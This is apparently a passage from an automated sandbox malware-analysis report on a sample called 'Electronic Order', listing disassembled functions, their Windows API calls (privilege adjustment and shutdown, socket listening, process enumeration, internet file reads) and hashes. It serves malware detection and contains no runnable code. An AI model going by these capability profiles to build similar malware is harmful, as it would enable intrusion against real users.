                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: d8b5aa674b9df5de5309d4653aef0c58f3d8d8e05aead4f4a7797c9680883822
                                      • Instruction ID: 342aa3625e59cb3a637665a915e00da174b826335854ba1c85bd0e68e286d7f0
                                      • Opcode Fuzzy Hash: d8b5aa674b9df5de5309d4653aef0c58f3d8d8e05aead4f4a7797c9680883822
                                      • Instruction Fuzzy Hash: 7F129A70A0060ADFDF14DFA5D981AEEB7F5FF48300F14426AE446A7254EB35AE91CB60
                                      Function 00E2545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00E18CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E18D0D
                                        • Part of subcall function 00E18CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E18D3A
                                        • Part of subcall function 00E18CC3: GetLastError.KERNEL32 ref: 00E18D47
                                      • ExitWindowsEx.USER32(?,00000000), ref: 00E2549B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                      • String ID: $@$SeShutdownPrivilege
                                      • API String ID: 2234035333-194228
                                      • Opcode ID: c181d304039d06b799563cae0eea2cb000846291ef741ef3e6df3c43799e5bee
                                      • Instruction ID: a72e8dad905ee5cc87744d0c80df2959e10e11ea893ef536380f5e2420eef8bd
                                      • Opcode Fuzzy Hash: c181d304039d06b799563cae0eea2cb000846291ef741ef3e6df3c43799e5bee
                                      • Instruction Fuzzy Hash: 31012832655A312EE7287774BE4ABFAF258AB01757F242021FC27F20D2D6B00C804590
                                      Function 00E36596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E365EF
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E365FE
                                      • bind.WSOCK32(00000000,?,00000010), ref: 00E3661A
                                      • listen.WSOCK32(00000000,00000005), ref: 00E36629
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E36643
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00E36657
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                      • String ID:
                                      • API String ID: 1279440585-0
                                      • Opcode ID: dab4309bbdd1b8fd53d62b6423a4efe91a0e94bee56454f192bbb06db015a27a
                                      • Instruction ID: 7b1e87719532d7af77c602763f5ac1488677553704aa3e89f2033c9c720c3f12
                                      • Opcode Fuzzy Hash: dab4309bbdd1b8fd53d62b6423a4efe91a0e94bee56454f192bbb06db015a27a
                                      • Instruction Fuzzy Hash: 94219135200200AFCB10AF65C94AF6EBBF9EF49724F158159E956F72D1CB70AD05CB61
                                      Function 00DD5680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DE0FF6: std::exception::exception.LIBCMT ref: 00DE102C
                                        • Part of subcall function 00DE0FF6: __CxxThrowException@8.LIBCMT ref: 00DE1041
                                      • _memmove.LIBCMT ref: 00E1062F
                                      • _memmove.LIBCMT ref: 00E10744
                                      • _memmove.LIBCMT ref: 00E107EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                      • String ID:
                                      • API String ID: 1300846289-0
                                      • Opcode ID: d2dfb09e70a3983337d340c4e7ef251f328b807581928441de144374a755f4c9
                                      • Instruction ID: 1475892d1e9cace6df30879fdc39139557440685afc59c1528be3fe1389e54a8
                                      • Opcode Fuzzy Hash: d2dfb09e70a3983337d340c4e7ef251f328b807581928441de144374a755f4c9
                                      • Instruction Fuzzy Hash: D7029170A00205DFDF14DF65D981AAE7BB5FF44300F14806AE80AEB395EB71DA94DBA1
                                      Function 00DC1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00DC19FA
                                      • GetSysColor.USER32(0000000F), ref: 00DC1A4E
                                      • SetBkColor.GDI32(?,00000000), ref: 00DC1A61
                                        • Part of subcall function 00DC1290: DefDlgProcW.USER32(?,00000020,?), ref: 00DC12D8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ColorProc$LongWindow
                                      • String ID:
                                      • API String ID: 3744519093-0
                                      • Opcode ID: 84bceb72f75809626221d66dd9a3689fbcbda7843cec302f54e71af4a60d6e64
                                      • Instruction ID: 09f6e51363d121f5f4b3cc68c4bc42cc2fa164998645db7a7a2c433be81da7ca
                                      • Opcode Fuzzy Hash: 84bceb72f75809626221d66dd9a3689fbcbda7843cec302f54e71af4a60d6e64
                                      • Instruction Fuzzy Hash: 32A1777810656BBEE628AB299C49F7F359DDB43351F29411EF543E7193CE20CC0296B2
                                      Function 00E36A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00E380A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E380CB
                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E36AB1
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E36ADA
                                      • bind.WSOCK32(00000000,?,00000010), ref: 00E36B13
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E36B20
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00E36B34
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                      • String ID:
                                      • API String ID: 99427753-0
                                      • Opcode ID: 57ec3bb53cc8c9b634748d8ec94c8afecaa2517eeaf8048e291b94021fa3275b
                                      • Instruction ID: 99d38e8c5e52b31e0e45e1a9f2793a888e76d7129b7550aa56714b350f26960d
                                      • Opcode Fuzzy Hash: 57ec3bb53cc8c9b634748d8ec94c8afecaa2517eeaf8048e291b94021fa3275b
                                      • Instruction Fuzzy Hash: A941B575700611AFEB10AF24DC9AF6EBBA9DB45B10F04805CF91AAB2D2CA705D018BB1
                                      Function 00E455FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: 4b9029a288644768ae024b62af67ccbe88f53f492623466c570e2b23b34f30aa
                                      • Instruction ID: 90e1ecd558988513d1b0ae1e431f92f49c80c056d333ce3a2e5690b39b6c1960
                                      • Opcode Fuzzy Hash: 4b9029a288644768ae024b62af67ccbe88f53f492623466c570e2b23b34f30aa
                                      • Instruction Fuzzy Hash: 7711C432700911AFE7212F27EC44B6FB798EF45721B425469F806F7252CB74DD02CAA5
                                      Function 00E3C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00E01D88,?), ref: 00E3C312
                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E3C324
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                      • API String ID: 2574300362-1816364905
                                      • Opcode ID: 41e38b6f830fd3d27dcf31f2fcd8e656068bb6718fb112907ac1d4b471e69a10
                                      • Instruction ID: 69b395e221cda0fe0e13fdc93731c5358b3a0d299173e85336a83c9085ef6787
                                      • Opcode Fuzzy Hash: 41e38b6f830fd3d27dcf31f2fcd8e656068bb6718fb112907ac1d4b471e69a10
                                      • Instruction Fuzzy Hash: 54E01274601713CFDB205F26D808A567AD4EF09B59F90D479E895F2750E770D841CB60
                                      Function 00DD3190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __itow__swprintf
                                      • String ID:
                                      • API String ID: 674341424-0
                                      • Opcode ID: 2242fd00d3298cba85f1d97848acd348372482fc32004621fc9dbc77dfbaac08
                                      • Instruction ID: c75e4777b1557b7b8568a66e87d7819e551c3287209ae77096cef50357f5d0a4
                                      • Opcode Fuzzy Hash: 2242fd00d3298cba85f1d97848acd348372482fc32004621fc9dbc77dfbaac08
                                      • Instruction Fuzzy Hash: 03227A716083419FD724DF24C891B6BB7E4EF84704F14492EF89AA7391DB71EA44CBA2
                                      Function 00E3F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00E3F151
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00E3F15F
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                      • Process32NextW.KERNEL32(00000000,?), ref: 00E3F21F
                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E3F22E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                      • String ID:
                                      • API String ID: 2576544623-0
                                      • Opcode ID: 8b7f3aa7f0f6422f58e863a6c0cba9db7725e406b3ab53eabe49d662a6168293
                                      • Instruction ID: 4e598bc541cde88857f9a190042f23fcd63d37ea309bf329d68854a3468f3f23
                                      • Opcode Fuzzy Hash: 8b7f3aa7f0f6422f58e863a6c0cba9db7725e406b3ab53eabe49d662a6168293
                                      • Instruction Fuzzy Hash: 67516B71504701AFD310EF21DC85F6BBBE8EF94710F10482DF495972A2EB70A909CBA2
                                      Function 00E240B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E240D1
                                      • _memset.LIBCMT ref: 00E240F2
                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E24144
                                      • CloseHandle.KERNEL32(00000000), ref: 00E2414D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                      • String ID:
                                      • API String ID: 1157408455-0
                                      • Opcode ID: c91b4676f4c68d616b2a0ced2d1acb3a92e246151f43c4d02a5dcab47f00b85a
                                      • Instruction ID: 1e4a77b77c96eda9e98bdaca6e036ba9e8cc3e5d533125a728e75e5a456d4b9e
                                      • Opcode Fuzzy Hash: c91b4676f4c68d616b2a0ced2d1acb3a92e246151f43c4d02a5dcab47f00b85a
                                      • Instruction Fuzzy Hash: DE11EB759012387AD7305BA5AC4DFABBB7CEF45B60F104196F908E7180D6744E848BA4
                                      Function 00E1EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E1EB19
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID: ($|
                                      • API String ID: 1659193697-1631851259
                                      • Opcode ID: 99a4e623ffc1f05f612e0ae6a12ca10f4834d4f9a1f4e7890dd5c1de4b849c97
                                      • Instruction ID: dbf5fc87fca90be5b2937333d78bc618edafc37d566f151cc22cc25160811d7c
                                      • Opcode Fuzzy Hash: 99a4e623ffc1f05f612e0ae6a12ca10f4834d4f9a1f4e7890dd5c1de4b849c97
                                      • Instruction Fuzzy Hash: 37321575A046059FDB28CF19C481AAAF7F1FF48310B15D56EE89AEB3A1D770E981CB40
                                      Function 00E325E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00E326D5
                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E3270C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Internet$AvailableDataFileQueryRead
                                      • String ID:
                                      • API String ID: 599397726-0
                                      • Opcode ID: 75519a2c46d083b4c7a5d4be1a06faa94a8896ea370e116dfda31f4fb1c5ae9f
                                      • Instruction ID: 62376460f4835ae4ca84a4caeb0b9247c3ba02efe109773a0d44e7196141b95f
                                      • Opcode Fuzzy Hash: 75519a2c46d083b4c7a5d4be1a06faa94a8896ea370e116dfda31f4fb1c5ae9f
                                      • Instruction Fuzzy Hash: 7C41D475900209BFEB209A55DC8AEBBBBBCEF40718F10506EF785B6140EA719E41D664
                                      Function 00E2B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00E2B5AE
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E2B608
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E2B655
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID:
                                      • API String ID: 1682464887-0
                                      • Opcode ID: e9b37739a5a49076fbd217102f5ee0d80ba6d8a8918ba7ed24edb03bc23c5145
                                      • Instruction ID: 497ea893d44e1ad7b2826d8ece9680823de8576ab813f8fb3b341ecc0699934a
                                      • Opcode Fuzzy Hash: e9b37739a5a49076fbd217102f5ee0d80ba6d8a8918ba7ed24edb03bc23c5145
                                      • Instruction Fuzzy Hash: 25215135A00518EFCB00EF65D884EADBBB8FF49310F1480A9E905EB351DB31A956CB61
                                      Function 00E18CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DE0FF6: std::exception::exception.LIBCMT ref: 00DE102C
                                        • Part of subcall function 00DE0FF6: __CxxThrowException@8.LIBCMT ref: 00DE1041
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E18D0D
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E18D3A
                                      • GetLastError.KERNEL32 ref: 00E18D47
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                      • String ID:
                                      • API String ID: 1922334811-0
                                      • Opcode ID: f10ca0ef9e95ff1a5e4010dbc9d98d6194b92a4cd96f524c5e0732e4f2a1e6f0
                                      • Instruction ID: 7d1b7072a2975384910b421e60202ab60f6d9b79b0b54a83c9c6387516a4e8dd
                                      • Opcode Fuzzy Hash: f10ca0ef9e95ff1a5e4010dbc9d98d6194b92a4cd96f524c5e0732e4f2a1e6f0
                                      • Instruction Fuzzy Hash: 43118FB1514309AFD728AF55ED85DABB7BDEB44710B20852EF456A3241EF70AC818A70
                                      Function 00E24C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E24C2C
                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E24C43
                                      • FreeSid.ADVAPI32(?), ref: 00E24C53
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                      • String ID:
                                      • API String ID: 3429775523-0
                                      • Opcode ID: 9ec13bb81f4d5dfa655bd07450a5139c98176029b48f4b0e36ba5d39374a0700
                                      • Instruction ID: 2518082c9f7bc8b913df2e9abb100a192f0f2699d552f23c5b3636df9cee8164
                                      • Opcode Fuzzy Hash: 9ec13bb81f4d5dfa655bd07450a5139c98176029b48f4b0e36ba5d39374a0700
                                      • Instruction Fuzzy Hash: 65F04F7591130CBFDF04DFF4DC89AAEB7BCEF08601F004469E501E2181D6705A048B50
                                      Function 00E28B13 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • __time64.LIBCMT ref: 00E28B25
                                        • Part of subcall function 00DE543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E291F8,00000000,?,?,?,?,00E293A9,00000000,?), ref: 00DE5443
                                        • Part of subcall function 00DE543A: __aulldiv.LIBCMT ref: 00DE5463
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
